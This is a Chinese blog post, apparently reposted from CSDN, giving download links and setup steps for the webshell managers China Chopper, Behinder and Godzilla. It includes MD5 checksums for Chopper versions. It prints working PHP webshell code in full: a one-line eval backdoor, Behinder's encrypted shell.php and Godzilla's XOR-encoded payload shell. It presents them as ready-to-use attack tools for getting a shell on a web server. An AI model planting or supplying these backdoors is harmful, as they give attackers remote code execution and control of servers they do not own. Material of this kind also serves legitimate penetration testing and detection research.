当前位置:网站首页>常用getshell工具的下载

常用getshell工具的下载

2022-07-17 13:53:00 quan9i

中国菜刀

下载链接
https://github.com/raddyfiy/caidao-official-version
下载后校验MD5值

certutil -hashfile caidao.exe MD5

在这里插入图片描述
与文档进行比对

(chopper.exe)md5各版本校验码(仅exe主程序): 
	20111116 => 5001ef50c7e869253a7c152a638eab8a
	20141213 => 4b4a956b9c7dc734f339fa05e4c2a990
	20160620 - ac86066ffd58779f4c0db5030574b0cb
	20160622 - acaf6564637ba97f73297b0096c2994c 	#修复了mysql乱码
	
	20160622配置文件caidao.conf - > 4ed9e48fcfc0119a0f47ea89db6cd6ab

更早:

	20111116 => 5001ef50c7e869253a7c152a638eab8a
		随GMT日期改变的动态密码,用法请注意看readme.txt
	20111022 => 7876d05ed4ee02967afc44a936186d2e
		Customize模式的C#服务端增加了数据库管理功能...
	20110811 => 854bb49a84ce784ad70da7fd356d4f49
		ASP.NET的上传部分Bug修复, 另写了一个Customize模式的C#服务端
	20110806 => 4c8bc36c41151170f701f755ef700916
		修复一些BUG
	20110710 => d89c5957a1dc72bb229be070635e19b2
		解决确认对话框返回值不正确的BUG。
	20110707 => ec66b85fba3a8b7d1a41910ae5239b24
		解决浏览器新标签页打开BUG。
	20110703 => 3a8140e8e124326388cb13e6d9d0d4b5
		配置里添了几个选项:
		默认终端程序路径设置示例:<SHELL>/bin/sh</SHELL>
		虚拟终端默认命令设置示例:<CMD>whoami</CMD>
		文件管理默认打开的目录设置示例:<CD>c:\windows\temp\</CD>
	20110630 => 7e6c415ca57e6ecaa6c61147a2549477
		数据库导入,自写脚本编码后再提交,修复浏览器小BUG,其它。
		网站开通自写脚本分享栏目,脚本编码规范可以看下载的示例。
	20110628 => 60b49098d099ad01c3d80a5f794d4ebd
		PHP连接MySQL加了个<L></L>选项,用来设置数据库的字符集;
		自写脚本可在浏览器里执行了,示例请看 Script/phpspy2011.ccc;
		解决目录文件过多时显示慢的问题;
		因为缓存库读取有了变化,本次更新后最好清空一下缓存库。
		可以下载ip.dat放到菜刀的目录,用来显示网站的国别。
		使用时的有问题可以给我发邮件。
	20100928 => c05d44dbe353525f492208d891b53875
		界面调整,修正了一些BUG,加了个ColdFusion版的示例服务端(仅文件管理和虚拟终端,MX 7及以下版本修改文件时间功能不可用)
	20100812 => 4398e87939edb8573c44592942dca503
		重大更新,从这个版本起,菜刀开放接口,支持所有的动态脚本,服务端可按需自定义。
		写了个jsp的服务端(文件管理/虚拟终端/数据库管理),其它服务端可根据接口自个写!

确认无后门,安装完成
开始使用,这个工具类似于中国蚁剑,用于连接一句话木马getshell
左边写路径,右边写密码即可,文件内容为<?php @eval($_POST[1]);?>在这里插入图片描述在这里插入图片描述

冰蝎

下载链接
https://github.com/rebeyond/Behinder/releases
创建shell文件,内容为冰蝎自带的那个shell.php即可,如下所示

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
    
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
    
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{
    public function __invoke($p) {
    eval($p."");}}
    @call_user_func(new C(),$params);
?>

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

哥斯拉

下载地址
https://github.com/BeichenDream/Godzilla/releases
shell内容如下

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    
    for($i=0;$i<strlen($D);$i++) {
    
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='verter';
$payloadName='payload';
$key='cb42e130d1471239';
if (isset($_POST[$pass])){
    
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
    
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
    
        if (stripos($data,"getBasicsInfo")!==false){
    
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

连接
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

原网站

版权声明
本文为[quan9i]所创,转载请带上原文链接,感谢
https://blog.csdn.net/Reme_mber/article/details/125810502

边栏推荐

猜你喜欢

随机推荐